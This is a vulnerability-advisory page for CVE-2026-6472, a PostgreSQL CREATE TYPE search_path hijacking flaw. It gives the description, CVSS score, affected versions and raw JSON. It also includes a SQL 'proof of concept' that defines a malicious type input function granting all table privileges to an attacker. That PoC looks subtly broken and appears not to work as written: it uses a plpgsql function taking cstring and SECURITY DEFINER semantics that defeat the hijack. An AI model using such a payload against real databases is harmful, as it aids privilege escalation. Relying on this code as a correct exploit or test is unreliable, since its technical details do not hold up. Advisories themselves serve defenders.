Security Vulnerability Report
CVE-2026-6472 CVSS 5.4 MEDIUM

CVE-2026-6472

Published: 2026-05-14 14:16:25
Last Modified: 2026-05-14 16:21:23
Source: f86ef6dc-4d3a-42ad-8f28-e6d5547a5007

Description

Missing authorization in PostgreSQL CREATE TYPE allows an object creator to hijack other queries that use search_path to find user-defined types, including extension-defined types. That is to say, the victim will execute arbitrary SQL functions of the attacker's choice. Versions before PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 are affected.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PostgreSQL < 18.4
PostgreSQL < 17.10
PostgreSQL < 16.14
PostgreSQL < 15.18
PostgreSQL < 14.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```sql
-- Step 1: Create a malicious function that executes arbitrary SQL
CREATE OR REPLACE FUNCTION public.evil_type_in(cstring) RETURNS int4 AS $$
BEGIN
  -- Example malicious action: Grant privileges to attacker
  EXECUTE 'GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO attacker';
  RETURN 1;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

-- Step 2: Create a type that uses the malicious function
-- Assuming the victim looks for a type that resolves via search_path
CREATE TYPE public.hijacked_type (
  INPUT = public.evil_type_in,
  OUTPUT = int4out,
  RECEIVE = int4recv,
  SEND = int4send,
  INTERNALLENGTH = 4,
  PASSEDBYVALUE,
  ALIGNMENT = int4_align,
  STORAGE = plain
);

-- Step 3: Wait for victim to execute a query that implicitly uses this type
-- e.g., a function or query that casts to 'hijacked_type' via search_path
```

References

https://www.postgresql.org/support/security/CVE-2026-6472/
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-6472", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2026-05-14T14:16:24.757", "lastModified": "2026-05-14T16:21:23.190", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authorization in PostgreSQL CREATE TYPE allows an object creator to hijack other queries that use search_path to find user-defined types, including extension-defined types. That is to say, the victim will execute arbitrary SQL functions of the attacker's choice. Versions before PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 are affected."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://www.postgresql.org/support/security/CVE-2026-6472/", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"}]}}
```